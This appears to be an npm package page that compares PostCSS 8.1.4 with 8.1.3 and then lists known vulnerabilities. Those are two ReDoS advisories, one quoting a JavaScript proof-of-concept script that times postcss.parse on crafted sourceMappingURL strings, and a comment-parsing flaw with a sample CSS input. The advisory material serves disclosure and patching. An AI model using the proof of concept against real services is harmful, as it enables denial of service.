PostCSS version 8.1.4 is a minor update to the popular tool for transforming styles with JavaScript plugins, building upon version 8.1.3. Both versions share identical core dependencies, including nanoid for unique ID generation, colorette for terminal styling, source-map for debugging, and line-column for precise error reporting, ensuring a consistent development experience. They are licensed under the MIT license and maintain the same repository link and funding details. Authored by Andrey Sitnik, PostCSS continues to provide a robust platform for modern CSS development with a strong focus on community collaboration.
The key difference lies in the "dist" metadata, specifically the unpackedSize. Version 8.1.4 has an unpacked size of 197041 bytes, slightly larger than version 8.1.3's 196941 bytes, indicating a minor adjustment or addition of around 100 bytes. This difference, while small, might hint at bug fixes, performance improvements, or minimal feature enhancements incorporated into the codebase. The release date helps in identify the newest release, which in this case it's 2020-10-24T00:03:31.342Z for version 8.1.4 against the release date of 2020-10-23T02:20:49.337Z of the old version. Developers using PostCSS should consider upgrading to version 8.1.4 for the latest refinements, even if the change seems incremental. This ensures access to any potential optimizations and bug resolutions, contributing to a more stable and efficient styling workflow because the update is relatively recent to the previous release.
All the vulnerabilities related to the version 8.1.4 of the package
Regular Expression Denial of Service in postcss
The npm package postcss from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.